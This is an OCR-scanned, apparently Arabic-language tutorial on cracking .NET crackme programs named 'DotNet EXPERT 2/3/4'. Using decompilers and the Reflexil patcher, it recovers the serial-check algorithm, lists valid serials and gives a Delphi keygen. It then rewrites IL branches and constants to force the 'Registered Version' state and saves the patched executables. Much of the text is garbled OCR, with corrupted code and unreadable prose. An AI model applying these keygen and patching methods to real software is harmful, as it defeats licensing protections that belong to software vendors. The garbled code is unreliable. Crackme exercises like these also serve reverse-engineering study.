Istr5 = (str5 8 Conversions. ToStrina($t9.Chars(num))) 
Elself ((num Mod 4) = 2) Then 
Str6 = (str6 8 Conversions. ToString(Str9. Chars(num))) 
Elself ((num Mod 4) = 3) Then 
istr7 = (str7 8 Conversions. ToString(str9.Chars(num))) 
End If 


UySEE7ad 


num += 1 
Loop While (num <= 71) 
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aNum=1 3H 1 Mod 4=1 > St5 = Str5 + Str9(1) Y Str5 = b 


7270440 caals ión 53 old yo ya Str7(Str6, Strs, Stra, O 
000 2 aldea jo dog doi QolUÍÓn ju y ladra: 
Deblector yde Já dez )1 


.) DotNet Expert 2.exe (La ¿as y ya Cló )2 


epa A 
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Deblector 


IL view | Disassembly 


[8] string str8, 

[9] string 

[107 int32 
int32 
int32 
int32 
char ch) 


L_0001: str " 
L_0006: 
L_0008: Tdstr 


sur] 


a AY e F7 333 ES 
112233445566778899:) 16% Gunjónst (de sc Gócorocadó 69 )8 
E Register ¿0gualábgdd so ares dlzci y tada ón )9 


yaoi 00c0 (y tad cs lao ll pas caia). 


L700b4: 1dloc.1 


ia Una 

L_00b6: add. ow a > 
LZ00b7: stloc.1 47 (Hex ) = 71 Decimal 
L_0068: Idloc.1 z 


L_00b9: Tdc.14.s 0x47 


L_00bb: ble L_003< Loop While ( num <=71) 


L_00c2: OC.S 
L_00c4: Tdloc.s 
L_00c6: ldloc.s 
L_00c8: call string [mscorlib]system.string::Concat(string, 


pálida ga ás 0000 , »] aj y ÍTabicadr7 


sy Auto UV dra) oi asiceStr7(Str6, Str5, Stra, ). 
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Shell | Auto [Calls | Modules | Quick View 
local_0 (type='System, String') value=<null> 


local_2 (type="System, String") value= 


local_8 (type='System, String") value= 


Strá  ="aeimquyCGKOSW- 
4826" Str5 
="bfinrvzDHLPTX15937" 
Str6 
="cgkoswAEIMQUY26048 
" Str7 ="dhlptxBFINRVZ37159" 


A a oa O O Ls? 
edi cura uo qq 00 al! ya ay y Zoe al 5d agas yy EN Cea; : EE 


str8 = (str4 4 str5 € stró € str?) | 


dde do js ge oa) de a gos 8 


Str8  = "aeimquyCGKOSW-4826bfinrvzDHLPTX15937cgkoswAElMQUY26048 dhIptxBFINRVZ37159" 


als ja y 3199245 00 ¿old : 


str4 = Strings.Mid(str4, 1 
str5 = Strings.Mid(str5, 1 
stró = Strings.Mid(str6, 1 
str7 = Strings.Mid(str7, 1 


p0ul rollo al) jas jo ¿otra e Js: 


Strá  =aeimquyCG 
Str5  =bfinrvzDH 
Stro  =cgkoswAEl 
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Str7  =dhlptxBFJ 


Dim num4 As Integer 
Dim ¡As Integer = 0 
Do While (¡ <= num4) 
If (Strings.InStr(strá, Conversions. ToString(StrIn.Chars(i)), CompareMethod.Binary) <> 0) Then 
EZ = ZA Strinos.MB(str 4, Conversions.ToString(StrIn.Chars(i)), CompareMethod.Binary). ToString €: 
Elself (Strings.InStr(str5, Conversions.ToString(Strin.Chars(i)), CompareMethod.Binary) <> 0) Then 


str2 = (str2 8 Strings. InStr(str5, Conversions. ToString(StrIn.Chars()), CompareMethod.Binary).ToString "2% 
Elself (Strings. InStr(stró, Conversions.ToStrina(StrIn.Chars(i)), CompareMethod.Binary) <> 0) Then 

str2 = (str2 8 Strings.InStr(str6, Conversions.ToString(StrIn.Chars(i)), CompareMethod,Binary).ToString 23) 
Elself (Strings. InStr Conversions.ToString(StrIn.Chars(i)), CompareMethod. Binary) <> 0) Then 

str2 = (str2 8 Strings. InStr(str7, Conversions.ToString(Strin.Chars()), CompareMethod,.Binary).ToString a 45) 
End If 
i+=1 

Loop 


A A 
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A 


6tO je goya ¿GIÉ "a Str, ("InStr) Eve yo ¿yaa ad ¿ucióaStra 
30 InStr(Stra,"a")=1041=5* 65% 


E ENT 


y 


E Ótaya 0 


ade oción aero: L* do 


E RO bl 
Fs, And He 
EC E qa ¿Susi OS yal y 


” 


As 2 Só5ya Stro có ¿yal 


+33 009 zu" o 
Ñ € CGAsHiiyaStr5 o 


+34 clas” 


.)112244617383124392( qa 2103909 15060) 030 BTROLick ¿2? cl $2 03: VII ds 


[text] = Me.Ts.Text ) 
Tf (([text].Length > 16) AndAlso (RHA.GetValue(Strings.Mid([text], 1, 9)) = "112244617383124392”)) Then 


abi 9 U cada lll 2009 En H— 


lr lle As aa loss agz: ATARE ya EN ice z 


patos o o 
y ij ja 0 a ancla ja 


secó a 0d... 4993992951 (+ api di 


:)112244617383124392( ¿Us Éxaso 


Strá  =aeimquyCG 
Str5  =bfinrvzDH 
Stro  =cgkoswAEl 
Str?  =dhlptxBFJ 


1 2 4 1 3 3 2 3 2 
1 2 4 7 1 4 
Strá4 Str5 Str7 6 Strá4 Str6 e Str6 Str5 Str6 i Str5 
a f p u A E b (2) H 
afpuAEboH 


afpuAEboH112233445566 ¿4 


a 


Fern y da O oa AN O) 
Qu E h 


¿1 00319 ¿57 3951) ads) rat ¿ld >> BTRCLICK 


cl ago: 


IL view | Disassembly 


: Call string [m 
¿ call string Dot 


GetValue 
EA ERA 
dloc.Ó 
2 Tdstr "112244617383124392" 
2 Tdc.14.0 
L_0039: call int32 [microsoft.visualBasic]micr 
L_003e: Tdc.14.0 


a 


La Tar dra 


A] 


Shell | Auto Calls | Modules | Quick View 
local_0 (type='System,String') value="" 
local_1 (type="5ystem.String') value="afpuAEboH112233445566" 

this (type='DotNet_EXPERT_2.MainForm') fields: 
E sender (type='System. Windows, Forms,Button') fields: 
E e (type='"5ystem. Windows. Forms.MouseEventArgs') Field 


all Bu lruslUzJad ¡pit 2009 (12) 
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AI A sas ¿dea GetValue UU 3 yal yy : SO F1O Gs 


Deblector 


IL view Disassembly. 


120025: ldc.14.s 9 
L_0027: call string [microsoft.visualbasic]mi 
L_002c: call string DotNet_EXPERT_2.RHA: :Getv 


<€— 
L_0033: str "112244617383124392" 
L_0038: ldc.14.0 
L_0039: call int32 [microsoft.visualBasic]mic 
L_003e: ldc.14.0 


U A La Tarda 


« Mm 


Shell | Auto [Calls | Modules | Quick View 
local_0 (type='System.String') value="11224 1] 
local_1 (type='System, String") EAST 12233445566" 
E this (type="DotNet_EXPERT_2.MainForm') Fields: 
E sender (type='"5ystem. Windows. Forms.Button') fields: 
E) e (type='5ystem. Windows. Forms, MouseEventárgs') fields: 


PA E abóniya ) AJÍ Lo, 53 o ao da hyodó Ed Ji. ge abónyye GscoY yr 11 


afpuAEboH: 23% das rodó 


UGEnAN public static int32 Comparestringóstri 


.maxstack 4 

«locals init (€ 
[0] int32 num, 
[1] int32 num2) 


L_0001: rg.1 
L_0002: be. un. 5 L_0006 


m1 


Modules | Quick View 
local_0 (type="/4') value=<N/A > 
local_1 (type="/4') value=<N/A > 
Left (type="5ystem.String') value="112244617383124392" 
Right (type='System.String') value="112244617383124392" 
TextCompare (type="5ystem,Boolean') value=False 


- JUY ¿31Jé> BTROICk 59 jeta 60, SN ¿ala a da ja a GetValue Ha ¿ab q, 457 
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415 ao) 

1: tó EasoduaStra 
5 sl dnd 


Al a el 2% A A z era 
job? ad ds al) (17 gs Galas 1 392 393 394 1 ¿A arg ¿ujoya! 


A E ST 


cb 


Dim str As String = str2 
I 


Then 


—+ Return str 
End If 


—+Return str3 


dl 
e 2 A CA bb. h chos e 
Lp 346% GIsNumeric Not - Y AA BY ña 35 ya el id 


E A E AN E A E A E 


al. 


MÍ: ¿ved ¿Qi 


¿alt de) 


1 


std e de dues ¿Y te 


JONA ¿aria zo 90 


«Start=Start+2(0,2,4,) 04 15022 vaózua? ge vigaó 
- Mid(Strin,Start,2) 040 19 bc óS o 19700: 
e 93: Mid(Strin,0,2) 
co Ys: Mid(Strin,2,2) 
0 SS : Mid(Strin,4,2) 
cz: Mid(StrIn,6,2) 


0000 


3lgllá dz a ¿caló q cta ¿Quoc ya Str8 ¿QoS ayi caga ¿ua Way CA 


all Bu ls vall de Ado ¡pat 2009 14) 


lg les aa loe pago: ATARE ya EN RP TIA 


80) 30 04157 
Aba rasocaStI: 
Str8 = "aeimquyCGKOSW-4826 bfinrvzDHLPTX15937cgkoswAElMQUY26048 dhIptxBFIJNRVZ37159" 


cau ¿aca y UY dio all at Er c oe jizO 32061): 


Str8yadiidy) 14(é 
Str8uaiiá cio) 31(6 

)pisivasa 39 
Str8 yal ci) 35(Óv:0b0b:7 o 


-GetValue eje Go 4U 49) 4157 £ só e a 


as 


va + A 
y ds 
ya e y 


ue o ( o de 
14313235 
afpuAEboH14313235 : ¿des Q 
¿2úábo 5 3160 RegCode Cedo ista Registered Register ¿He ig2aa do ? 


danes) 30b* sa 00 ¿Eb Registered * 


eras sde 


¿aida alas ¿ralla roda eto 


Strg  = "aeimquyCGKOSW-4826bfinrvzDHLPTX15937cgkoswAEIMQUY26048dhIptxBFINRVZ37159" 


alos 050004 isióosbss*s(14-52) 
2) 0 :1 giá ib as* (31-69) 
ió) 9005 iia st (32-70) 


ES 7 jgiárild*s (35-68) 


0000 


[4] Location [1] Location [5] Location [7] Location Serials 
32 35 14313235 
68 14313268 
sá Sl 70 35 14317035 
68 14317068 
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32 35 14693235 

69 68 14693268 
70 35 14697035 

68 14697068 

32 35 52313235 

31 68 52313268 
35 52317035 

de 68 52317068 

AS 32 35 52693235 
68 52693268 

ES 70 35 52697035 
68 52697068 


R 


E 


pu IGÁRO ) 5 j £) ¿uade a ES a 
Esta din qa 


An $e Ja Ds tos lxs Ú ». 


var 
Form1l: TForml; 
I: Integer = 0; 
Const 
Array2S : Array[0..15] of String =('14313235' 
y "14313268" 
y 14317035" 
, 14317068" 
p "14693235" 
, 14693268" 
p IAGITOIO" 
, "14697068" 
¿ S2313235" 
+ "52313268" 
oli 03" 
y "S23L 7068" 
SES e IS VASION 
+ 52693268" 
¿5269 7035" 
¿"52697068 ")4 


implementation 

[$R *.dfm) 

procedure TForml.BTGenClick(Sender: TObject); 
begin 

//Method +1 ===> Random 

Randomize; 

TReg.Text := 'afpuAEboH' + Array2S[Random(15)]; 
//Method 42 ===> Ordinal 
if 1> 15 Then 1 := 0; 
TReg.Text := 'afpuAEboH' + Array2S[I]; 
I= I +1; 
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1): Reflex ¿os ao cta reos bl tdo JE lor ¿ao Las dos, 


E Earle 3 Expert DotNet Q0c3 Days als Reflixel 


ye ¿pd ee Lao ly 


Reflector O) 
Reflexil 0) 


DotNet EXPERT 3.exe 


nz 


oo? alle + 5 Assembly: 
Name 


agoóN rue Reflector yt cad Ad ¿¿qémestós saco 


+ +2 PresentationFramework 
+ 2 Microsoft. YisualBasic 
CA E DothNet EXPERT 3 


Y 


Assembly Name 


A INS 
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Sn errada ¡TT delta 


salojya ja E Past all ql ae sal Aya dd ¿cón, 


Assembly Definition Name Assembly ¿32 Y gU3ce 


E] DothHet EXPERT 3 


A 


Definition | Name definition. 


E +2 Microsoft. YisualBasic | ENE A 


Ea 


ME 


AN NE 


aid 3yalls ¿Reflexi e 


Assembly Name 


Main module (main), Mvid=ee713c1e-b238-4bF6-b525-5f34a32a2c7e 


Entry point Main 


y] (E) 


Target runtime (NET_2 0 


Kind windows 


AssemblyName :-2¿ 135 Name definition 44 «.óy 


Sebastien LEBRETON's Reflexil vO,9 
Assembly definition 


Definition. Name definition 


[] HasPublicKey Xx 


[] IsRetargetable Name DotMet EXPERT 3 : 


[7] IsSideBySideCompatible Culture 


Version 


3417 


5 


PublicKey 


PublicKeyToken 


Algorithrn 


Patched_1 o baya ¿ogncue che Patched_3 
GU 
Assembly definition 


Definition | Name definition 


[] HasPublickey > 
[] IsRetargetable Name Patched_1 


[] IsSideBySideCompatible Culture | 
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Name Exe já fgya ml o ENS SOI Assembly Name-BUigllaaá y áój0 (+) 


NS 07 


¿QM Erábalrne Ido bob j04ial] »ayaReflexil+9 ¿963044 definition Module 


«3 Microsoft, WisualBasic : - . 
8 + DotNet EXPERT 3 Sebastien LEBRETON's Reflexil 0,9 


IA DotNet EXPERT 3,exe 
[4 Resources y You can save a patched version 


Exe Name 


Icon 


jablJJV Mot 


asSave 


«Reload 


Patched_1 IS VÚsSave as N ga 


My Computer 


My Network Saveastype: | Assembly files (exe, *.dil [v] 


7 3% Ma 33d] Reflectorck» Patched_l.exe 2 00 ¿a dy esas dl YY 
30 v 


Patched_1: 


E «3 Microsoft, WisualBasic 
4 43 DotNet EXPERT 3 


A otched 
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37. 5]... Configure Reflexil [da 


q ¿yt Reflexil ¿=5 4 JJ 
Y 


jj aos js lija lo 2 e a da 


Configuration 


[7] Show PDB and MDB symbols 


Prefered input base Dec 
Row index display base Dec 
Operand display base Dec 


Language VisualBasic 


Le odogámjicóó pá pl, Reflexil oia tj js ¿op Gia a gh 


E 


. 


aro lali raya ia pos Reflector 3 


Eu 


¡miis olaa 0 ya Claya 


SS 
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Lo pl al ya ys aos gía ¿lios La 


¿yaV 1,V0, ¿do Jrs 3 E EA bss, 


Instructions € Variables ¿24441 Jl idas Ys 


qua jo 20 Alé BRVCÍck is uba! Ív de 


«Version Register 


*RegisterVersionás¿2) eos E64yBRVClickE Ga? da lua 
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. PS E 
¿MU ) ada) Y Constructor 


A 


eso  “53ctor() ¿dió ce és MainForm 


E «3 Patched_1 
E Mi, DotNet EXPERT 3,exe 
aj References 
a (0- 
E () DotMet_EXPERT_3 
(5 % GoAway 
8 % MainForm 
4) Base Types 
Qs Derived Types 


+) 


E) 


yáptuc baje OE 
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Me.InitializeComponent 


Public Sub New() 


Me.T1=0 
Me.IntT =0 


Me.StrArr = New StringO ( “Failure”, “Success”, "Failure", "Maybe Incorrect Input... 


End Sub 


t— 


estásocialdes GUY tal ya ya 4 JE y 6.) .. RadioButton PicutreBox, Button, (¿RE 0pe 


Me. 
Me. 
Me. 


Me. 
Me. 


Me. 


size = New Size(196, 24 


BRV.Size = size A 
Me.BRV.TabIndex =9 (a E 
Me.BRV.Text = “Register Version” 

Me.BRV.UseVisualStyl = 
AddHandler Me.BRV, Click, New EventHandler(AddressOf Me .BRVClick) 


sl call ¿gon a Version Register 


1 e 
e 9, 


BRV.BackColor = Color.Gray 
BRV.Cursor = Cursors.Hand A Ñ 
BRV.FlatStyle = FlatStyle.Flat id 


point = New Point(23, 381) 


BRV.Location = point add 
BRV.Name = "BRV” , 


Hilo Instruction ¿200546 ¿20 deso roGetGray ss 3 


a ay ul ao lll 


Aroca: só Je sálóljas gal 31 já juas 3: Button First My 


lil $e Edit 


System. Windows. Forms,Button DotNet_EXPERT_3.MainForm::BRY 


System. Drawing.Color System.Drawing.Color::get_Gray() 


callvirt E Create new... Base::set_BackColorís 
ldarg.0 | Edit. | 


ldFld e Replace all with code... RT_3,MainForm::BRY 


Call E Delete dows. Forms. Cursors::c 


callvirt E Delete all l::set_Cursor(System.' 


Edit existing instruction 


OpCode 


Description 


Operand type 


Operand 


Calls the method indicated by the passed method descriptor, 


-> Method reference EXISTO 


get_Gray 


Y ÉGet_Gray eds uti ie sa Ao (Get_Greentaoo zas: 


EA Gray() : System.Drawing.Color 
2% get_Gray() : System.Drawing.Color 
E-%% Green() : System.Drawing.Color 


get_Green() : System,Drawing.Color 


1865 


call 


1870 System. Void System. Windows.Forms.ButtonBase::set_BackColor(Sys 


My First (¿5 
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¿000586 35 tias y 


Button : 
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Edit existing instruction 


OpCode Idstr ¡| Update 


Pushes a new object reference to a string literal stored in the 


Description PABEACÍBIS: 


Operand type String w, 


Operand My First Button] 


ForFun:kib3ec 99Saveas  ¿YiVALal ja VÍ ¿Name Exeah.os 


E +3 Patched_1 


SI DotNet EXPERT 3.exe Sebastien LEBRETON's Reflexil 0,9 


f 3] References Module definition 
a 0 - 
E () DotMet_EXPERT_3 You can save a patched 


E () DotNet_EXPERT_3.My 
+) [3 Resources 


gala 2cual:) Fun.exe For (5900 


Standard Edition 


O Professional Edition 


PATO Gr 920 daa: BRVClick 


Reload lázya dal yáya ro ¿da Ós Reflixel  Jú3lisiópatched_1: 3912 Exe nameáe. yaóz) 


a 


da 
Zn 
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—MeIntT=0 
If ((Me.TNS.Text = ”) Or (Me.T55.Text.Length < 5)) Then 


Me.MacroMe(2, 3, 0) 
Else 


e il 


, AS IA A 
2- 3-0 ) Parameters pudo yz aicol ¿on joo! 


MacroMe as alles 


Public Sub MacroMe(ByVal StrUp As Integer, ByVal StrDn As Integer, ByVal Intlin As Integer) 


all) ls A y ll gdl 
IntT 


Me.LTT.Text = Me, 

Me.TRES.Text = Me 

Me, timer 1.Enabled = True 

Me.PB.Backgroundimage = Me.Img] 
End Sub 


jad! e yal gal gl 
StrArr 


A JU 


lguaStrarr gg ng ctor sun 


Me.IntT =0 
Me,StrArr = New StringQ ( “Failure”, “Success”, “Failure”, "Maybe Incorrect Input... 
— 
End Suh 


Failure 

Success 

Failure 

Maybe Incorrect Input 

Standard Edition 

Professional Edition 

What is Upper Text .. This Is Result .. 


NU bb uN PRO 


JoL+)0(vesila Maybe(3)-i235Failure(2)-¿¿353 MacroMe(2,3,0):s2:J5y*z 


A 


IntT: si III raro e eel ill já ajo lic 


().0 


MacroMe(0,3,0).s:MacroMe( 2,3,0) yadá peda gan y 
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luis lle As aa Ives agz: ATARE ya 90 WwelelVs e 


sado e ha aya 


dldés ¿yá zo dos aria Mg eya de gig 
dad ¿gl Hal pue a) ss 


Latas ME ¿pod 


) BRVClick (ol ego» os ¿eo ltda sigo ió, Wa uaillzs 
Select Case (Conversions.Tolnteger(str) + 10) 
Case 16 
Me.IntT += 147 
Me.MacroMe((Conversions.Tolnteger(str) - 5), (C 
Return 
Case 19 
Me.IntT += 1 “T 
Me.MacroMe((Conversions.Tolnteger(str) - 8), (C 
Return 


A A NOS 


berga iaa ls ¿de állés MacroMe ¿43 ju. 


3 


Se 3ld+e MacroMe 3389 29 e Instructions 400 ¿20 ay seal dzoNew Create 


4 ica lalo Ja al 


Public Sub MacroMe(ByVal StrUp As Integer, ByVal StrDn As Integer, ByVal IntIn As Integer) 
StrUp = (StrUp * Me.IntT) 
Intin = (Intin + Me, IntT) 
Me.LTT.Text = Me.StrArr(StrUp) 
Me.TRES.Text = Me.StrArr(StrDn) 
Me. timer 1.Enabled = True 
Me.PB.Backgroundimage = Me.Imgl .Images.Item(IntIn) 
End Sub 


Idarg.1 


Edit... 
02 12 ¿did svstem.In 


Create new instruction 


Description A two values and pushes the result onto the evaluation Insert before selection 


Operand type '[None] 


Operand 
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gn UY gyabicao Int de CE Oy: 1 gadá nt zo 00 ui Mero ¿caja ¿ozu ld Eo 
Grieg ye argo) Me (2 ¿lo ¿e ¿crvaldargo. 

slo ¿e ¿cayaldciad. deal) aia 
stfid vaa ul yde Int aa 0 jo 


¿pijo y 


JR Operand Operand Type OpCode 


aabt None None  Ldarg.0 


NN 1 da 
dis pda 


do Operand Operand Type OpCode 


ó ¿dajol asia goal None None — Ldc.i4.1 


, 
pe naa 
“Mus Aja 
qa Er 


Operand Operand Type OpCode 


dd ¿Qácaja ad abós Dalt intT Field reference Stfld 


Insert before Selection :: 
Vara 


Create new instruction 


OpCode 


Description Loads the argument at index O onto the evaluation stack, 


Operand type | [None] 


Operand 


Instructions ¡Variables Jl Parameters | Exception Handlers | Overrides | Attributes | 


OpCode Operand 


dera. 
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Insertbeforeús 33M ldci4l gastes ¿sp Create New — ályy ifigo eo hulla: do 
y ) Se 


Selection : 


Pushes the integer value of 1 onto the evaluation stack as an Insert before selection 
Insert after selection 


Description int32. 


Operand type [None] 


Offset OpCode Operand 
Do |0 
» 01 
02 |2 
A a O A AS ; A 
ca ca new create azi ja a ia Selection after Insert oo) lija dba: 


OpCode stfld (] Append 
Description Replaces the value stored in the field of an object reference or Insert before selection 


pointer with a new value, 
Insert after selection 


Operand type -> Field reference 


Operand | w 


Pluase select a field 


Í E)--2 Microsoft. VisualBasic 
E--3 mscorlib 


E- Mi, DotWNet EXPERT 3,exe 
O - 

S-( Dotilet_EXPERT_3 

E % GoAway 


en LEBRE y ,ctor() : System. Void 
Y BAVClick(System. Object, System.Eventárgs) : System. Void 
y BOSClick(System. Object, System.EventáArgs) : System. Void 
4 BRVClick(System. Object, System.EventáArgs) : System. Void 
> Dispose(System.Boolean) : System. Yoid 
¿o InitializeComponent() : System. Yoid 
4 MacroMe(System,Int32, System. Int32, System, Int32) : System. Yoid 
4 MainFormLoadíSystem. Object, System.EventáArgs) : System. Void 
4 Timer1Tick(System. Object, System,EventArgs) ; System. Yoid 
Y BAY: System. Windows.Forms.Button 
Y BCS: System. Windows.Forms.Button 
Y BRY : System.Windows, Forms, Button 
ye components : System.ComponentModel, IContainer 
e groupBox1 : System. Windows, Forms.GroupBox 
% ImaLl : System. Windows, Forms. ImageList 
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Instructions Variables | Parameters | Exception Handlers | Overrides | Attributes 


Offset 


stf ystem.Int32 DotNet_EXPERT_3.MainForm::IntT 


Patched_2.¿óJLj15ks Vs Patched_2 y Assembly Name-3¿ 4 305 


dEl 0d 1 y 0 Reflector 36 5 19S1JEs MacroMe aslWW dal sá a ra ¿ld 


Disassembler 


> 


El 2 Microsoft. WisualBasic 


=) Mi DotNet EXPERT 3,exe Public Sub MacroMe(ByVal StrUp As Integer, ByVal StrDn A 
4 aj References StrUp = (StrUp * Me.IntT) 
a ()- Intin = (intin * Me. IntT) 
= () DotNet_EXPERT_3 Me.LTT.Text = Me.StrArr(StrUp) 
E GoAwa Me.TRES.Text = Me.StrArr(StrDn) 


Me. timer 1.Enabled = True 
Me.PB.Backgroundimage = Me.Imgl.Images.Item(IntIn) 
End Sub 


4) Base Types 

E (4 Derived Types 
49 ,ctor() 

:Y BAYClick(Object, Eve 
Y BOSClickíObject, Eve 
Y BRYCIick(Object, Eve 
> Dispose(Boolean) : + 
¿o InitializeComponentí 
a A MacroMe(Int32, Int: 
Y MainFormLoad(Obje: 


Lago IntT sj reas 3040 qa ón do liga ai JU 500 capita 


O 5 Ji: 


Peezod is les) BRVOIICk (239 ¿isso alla ¿li gs Eo 


If ((Me.TNS.Text =*) Or (Me.TSS.Text.Length < 5)) Then 
Me.MacroMe(2, 3, 0) 
Else 


yo! 


O 


o io lao 


¿dbaion27 reas icagaret ártiga 200% sr brfalse.s kipliga 


aCEdit á350 ¿hyzó diria: ed200020 
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Edit existing instruction 


OpCode brs- 


Unconditionally transfers control to a target instruction (short 
form). 


Description 


Operand type |-> Instruction reference 


MA y as 0 du ¿eso ya a ¿oc y 2 ua: FirstServ 


A 


Else 
str = Services. FirstServ(Strings.Mid(Me.TSS.Text, 1, 5) 


Me 


AR A 
Oca pas 


0d ¿eczaós Edition Standard Cy ¿he 
Ai des ¿es ¿ue FirstServ 


duos di oue SecondServ jes). 


cor hb do ar31 0 


O AT Suya cdo) sar loo: 


1f Me.RBS.Checked Then 
Select Case Strings.Mid(str, 1, 2) 
Case "31" 
str = Services. SecondServ(Strings.Mid(str, 1, 2)) 
Exit Select 
Case "41" 
str = Services. ThirdServ(Strings.Mid(str, 1, 2)) 


End Select 
Else 


Baja póua: 


E CN A 
: 3 19as de Ay CULSey Mza ES 


A a E 
Gio 


z O 
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. Enable Me Msg )1 
Enable Me ¿ls jes 32 
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Timer gags J5 
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Enable Me 44 $ 


) 3 Dotiet EXPERT 4 
= Mi DotMet EXPERT 4,exe 
+ 3] References 
e (Y - 
= () Dotiet_EXPERT_4 


Public Sub 


Me.Btn1.BackColor = Color. Silver 
Me.Btn1.Cursor = Cursors.Hand 
<— 
Me.Btn1.FlatStyle = FlatStyle.Flat 
Me.Btn1.ForeColor = Color.Maroon 
point = New Point(8H42, 8H23) 
Me.Btn1.Location = point 
Me.Btn1.Name = 'Btn1” 


0725 2506 Idarg.0 
0726 2507 ldFld System. Windows, Forms.Button DotMNet_EXPERT_4.MainForm::Btm1 
» 0727 E 


0728 
0729 
0730 
0731 


¿3 
OpCode ldc.i4.1 


0732 A A 

Description Pushes the integer value of O onto the evaluation stack as an 
0733 int32. 
0734 
0735 Operand type [None] 7, 
an mor Pra al 


Module definition 


You can save a patched version 


| Save as ... 


| Reload 


abi ly 9 U cada lll 2009 Gas H— 


lg les iaa los pago: ATARE ya EN lodicluedors e 


Enable Me y gl ¿urb 


pajas g9cóly y 
£ja, Cd Gas op* dj aso MasterlD ¿*3yad ¿ú d Timer IJJSé da 3, ¿ Lo eya: 


34 q0 lios Mako, 3450 A ¿hs jaja Step2, Po 


4 Btn3ClickíObject, Eventárgs) ; Yoid 
MButtoniClick(Object, EventArgs) : Void 


¿4 Dispose(Boolean) : Yoid 


y 5, ¿bs Fa EN) dl alo 


Me.Btn2. Visible = True 
Me.Txt2. Visible = True 
Me.MasterID = 1 

Me, timer 1.Enabled = True 


Idarg.0 
ldFld System. Windows. Forms. TextBox DotNet_EXPERT_4,MainFor... 


Edit existing instruct on 


OpCode bras + | Update 
Description e il transfers control to a target instruction (short | 


Module definition 


You can save a patched version V/. 


| Save as... | 


| Reload | 


CEE vag?) 2 Step 


ai ly Uca lps 2009 632 H— 


libre lee As Uat loss agz: ATARE ya EN cicle z 


:) ATARE std ales roo a ju als sb dro jas Hex rá d304154345245| 


If (str ="4154345245”) Then 


Me.Txt3.Visible = True 


Me.MasterID += 1 
Me, timer 1.Enabled = True 
End If 


« Fares? ns 
o ds uz h ya do 


Utvabr.sa ¿20938 jim ogos 
Pe dede. IFStr=StrThen:vasibadjgi 4154345245 


: Ldloc,1 istádayastr je ¿Op jols loc.1 IU all, 


32 (79 ldloc.1 Idloc.1 = str 
4154345245 


Edit existino instruction 


OpCode Update 


Description E the local variable: at Elis 1 onto ¡de vado pa 


Operand type [None] 5] 


Module definition 


You can save a patched version / 


Save as ... 9 
Reload 


YO aL ¿oo Jura 3 UJY sl, ? 


If (str = str) Then 
Me.Txt3. Visible = True 
Me.MasterID += 1 
Me, timer 1.Enabled = True 
End If 


28 2/13 0980 dado lbs 2009 633) 


lg E As iaa loe ago: ATARE ya 9 lodo z 


4 Timer1Tick(Object, Eventáras) : Void 
MITxt3TextChangedíObject, Eventárgs) : Void 
Y Bt4 : Button 


O E ñ E os E ] 
¿dd ¿ye al 29 GA) atu Version Registered ar 


Public Sub Txt3TextCha Val sender As Obj ByVal e As EventArgs) 
If ((Strings.L AndAlso aaa; Then 


Dim str As String = (Strings.Mid(M£Txt3.Te: 1) 4 Strings.Mid(Me.Txt3.Text IM 1) 
Try 
If (Conversions. ToInteger A) =15) Then 


Me.Lb4,Text = Registered Version” 
Me.MasterID += 1 


Me. timer 1.Enabled = True 
End If 


ABI vaa juro ja (11) pábeso MasterlD 30232 < dades y En 


(1) sá y apodo a (5) (as to as errobo) (3) >) 50: a 
9 2 Mz ) 15 ¿520 
ESTE 


61 ite(1)J2(2)... ¿labio (ua 5 


d60S ide dao 30 TB aca a o [100050000 


07 621 ldFld System. Int32 DotNet_EXPERT_4,MainForm::MasterID 


Edit existing instruction 


OpCode lldc.i4.1 


Pushes the integer value of 1 onto the evaluation stack as an 
int32. 


Description 


Operand type [None] 


Operand 


a ly el dao lll 2009 


lil leg As oda los ag: ATARE yá ga ie dOt 


ldfld System.Int32 DotNet_EXPERT_4.MainForm::MasterID 


bne.un.s -> (50) ret 


Edit existing instruction 


OpCode blt.un.s Y 7 


Transfers control to a target instruction (short Form) if the First 
value is less than the second value, when comparing unsigned 
integer values or unord£red float values. 


Descriptior 


Operand type -> Instruction reference 


Operand -> (50) ret 


Y 3320 Txt3 (¿Lo.* a (Ldarg.0)+ 
Cong ds do) o ( Set Text): 


+)LdStr(iádóa +) Lafid(oíá job gus dai 


Idarg.0 
Create new instruction 


OpCode | Append J 


Loads the argument at index O onto the evaluation stack, Insert before selection 


Insert after selection J 


Description 


Operand type [None] 


Operand 


Instructions | Yariables | Parameters | Exception Handlers | Overrides | Attributes 


D Idarg.0 
» o 1 Idarg.0 


OpCode df | | Append 


Finds the value of a field in the object whose reference is Insert before selection 


it currently on the evaluation stack, 


Operand Tata Ñ ] 


Insert after selection | 


28 2/13 00 dado lbs 2009 35) —— 


lid log is rd les ag: ATARE giga edo t 


nstructions — Variables | Parameters | Exception Handiers  Overrides | Attributes 


> | ( Append | 


Description dd Al new object reference to a string literal stored in Q | Insert before selection 
Insert after selection 
Operand type [String E 


Operand 


Idarg.0 
ldfld System. Windows. Forms, TextBox DotNet_EXPERT_4,MainForm... 
ldstr 00100050000 


Idarg.0 


Create new instruction 


OpCode ¡callvirt - Append | 


Calls a late-bound method on an object, pushing the retur Insert before selection 


value onto the evaluation stack, 
Insert after selection 
Operand type -> Method reference ¡9 


Operand set Text jor, 


Description 


E As 
ml: 


Offset 


System. Windows.Forms. TextBox DotWNet_EXPERT_4,MainForm... 
00100050000 


callwirt System. Yoid System. Windows, Forms, TextBox::set_TextíSyste... 


ais 0 U calado lll 2009 


lg E As aa loe ago: ATARE ya 9d RA TIA 


Module definition 


You can save a patched version V/. 


| Save as ... | 


| Reload | 


akí ¿o Jn E 


jed(By Val sender As Object, ByVal e As EventArgs) 


If ((Strings.Len(Me.Txt3.Text) > 10) AndAlso (1 >= 1)) Then 
Dim str As String = (Strings.Mid(Me.Txt3.Text, 3, 1) 4 Strings.Mid(Me.Txt3.Text, 7, 1)) 


Operand 


Save as ... 


Reload 


ai ly Uca lps 2009 (637 H— 


leds log As om loss ago: ATARE yá ga lie dot 


num = 1 

Do While (num <= num3) 
num2 = (num2 + Strings. InStr(str, Strings.Mid(Me.txtn.Text, num, 1), CompareMethod. Binary) 
num += 1 

Loop 


If (num2 = 0) Then 
Interaction.MsgBox(“InCorrect Serial... *, MsgBoxStyle.Exclamation, Nothing) 


Else 


)udyól llegas 39 gala est alos ada, lar ¿gue zi maálicas (Str 


¿yoigo (Str) «¿alió ld ada ia 30 


3 


AO didas 


olla qc ppoiiaStr * 
InStrádya0 eos cue do): 
Dim numé6 As Integer = Strings.Len(Me 
num = 1 
Do While (num <= num6) 
str5 = (str5 8 Conversion.Hex(Strinos. Asc(Strings.Mid(Me.bxts.Text, num, 1)))) 
